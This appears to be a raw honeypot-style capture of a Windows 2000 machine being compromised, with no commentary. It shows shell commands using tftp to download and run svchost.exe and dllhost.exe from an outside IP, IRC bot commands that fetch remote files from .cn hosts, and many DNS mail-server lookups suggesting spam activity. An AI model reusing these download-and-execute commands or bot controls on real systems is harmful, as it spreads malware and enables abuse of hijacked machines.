VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> VICTIM: dir wins\\dllhost.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> VICTIM: dir dllcache\\tftpd.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> VICTIM: tftp -i 222.238.17.184 get svchost.exe wins\\SVCHOST.EXE VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000: VICTIM: Transfer successful: 29456 bytes in 10 seconds, 2945 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: tftp -i 222.238.17.184 get dllhost.exe wins\\DLLHOST.EXE VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: Transfer successful: 19968 bytes in 7 seconds, 2852 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: wins\\DLLHOST.EXE VICTIM: NICK tyffftgfUSER i020500 . . :- VICTIM: Service Pack 2JOIN &virtu ATTACKER: :u. PRIVMSG tyffftgf :!get http:/dretis.cn/oc/box.txt VICTIM: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost: dretis.cnPragma: no-cache ATTACKER: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: kritq.cnConnection: Keep-Alive ATTACKER: GET /dll/20.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: onuka.cnConnection: Keep-Alive ATTACKER: GET /ag/lo7.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: onuka.cnConnection: Keep-Alive ATTACKER: GET /main/stat.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: onuka.cnConnection: Keep-Alive ATTACKER: PING :j. ATTACKER: PONG :j. VICTIM: JOIN &virtu VICTIM: \001\000\000\000\201\276b% VICTIM: \025\310\3741\225 ?\031\227Bg \211B\327N\350\263b\014\347\004\275\022\t\306G\025\310\3741\226 ?\031\225Bh \205B\305O\364\260\326 \201Bb \025\310\3741\224 ?\031\225Bj \205B\325E\362\265\313O\357BK\207\343g\025\310\3741\227 ?\031\225Bi \205B\330E\357\246\321R\201Nb \201\025\310\3741\226 ?\031\223Bj \203B\316D\363\266\333P\344Bc \025\310\3741\227 ?\031\225Bi \205B\316D\363\270\307R\201yb \201\025\310\3741\246 ?\031\230Bi \222B\331I\357\270\307R\201Gb \201Bb \201\325j \201Db \201Bb!\027\337\3607\206 ?\031 VICTIM: \000\002\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\004\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\006\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000\010\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\000\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: \000\014\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\016\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\020\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\022\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000\024\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\026\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\030\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\032\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\034\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\036\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000 \001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\$\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000.\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \0004\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \0006\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000:\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000B\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000H\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000V\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000X\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000d\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000f\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: \000j\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000l\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000p\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000r\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000v\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000x\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000z\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\202\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\206\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\214\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\216\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 ATTACKER: PONG :j. VICTIM: JOIN &virtu VICTIM: \000\226\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000\230\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\236\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\240\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\242\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\252\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\256\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\266\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\270\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\272\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\274\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000\300\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\302\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\304\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\306\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: \000\324\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\330\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000\332\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\344\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\346\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\356\001\000\000\001\000\000\000\000\000\000\005gmail\003com\000\000\017\000\001 VICTIM: \000\360\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\362\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \000\364\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \000\366\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \000\370\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \000\376\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \001\010\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \001\001\000\000\001\000\000\000\000\000\000\007hotmail\003com\000\000\017\000\001 VICTIM: \001\014\001\000\000\001\000\000\000\000\000\000\003web\002de\000\000\017\000\001 VICTIM: \001\036\001\000\000\001\000\000\000\000\000\000\005yahoo\003com\000\000\017\000\001 VICTIM: \001 \001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: \0010\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \0018\001\000\000\001\000\000\000\000\000\000\003ns2\004msft\003net\000\000\001\000\001 ATTACKER: PONG :j. VICTIM: JOIN &virtu VICTIM: \001@\001\000\000\001\000\000\000\000\000\000\003aol\003com\000\000\017\000\001 VICTIM: \001P\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001R\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001V\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\\\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001`\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001d\001\000\000\001\000\000\000\000\000\000\004alt4gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001l\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001n\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001p\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001t\001\000\000\001\000\000\000\000\000\000\004alt4gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001x\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\214\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\224\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: \001\240\001\000\000\001\000\000\000\000\000\000\004alt4gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\246\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\262\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\270\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\304\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\306\001\000\000\001\000\000\000\000\000\000\004alt4gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\312\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\334\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\340\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 ATTACKER: PONG :j. VICTIM: JOIN &virtu VICTIM: \001\352\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\362\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \001\374\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\002\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\004\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\010\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\026\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: |\010\000\000\001\000\000\000t\000\000\000\305\000\000\000\000\000\000\000\005\000\223\010\002\000\000\000\000\000\000\000 VICTIM: \002\032\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\036\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\\001\000\000\001\000\000\000\000\000\000\004alt4gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002\$\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \002*\001\000\000\001\000\000\000\000\000\000\004alt2gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \0020\001\000\000\001\000\000\000\000\000\000\004alt1gmail-smtp-in\001l\006google\003com\000\000\001\000\001 VICTIM: \0022\001\000\000\001\000\000\000\000\000\000\004alt3gmail-smtp-in\001l\006google\003com\000\000\001\000\001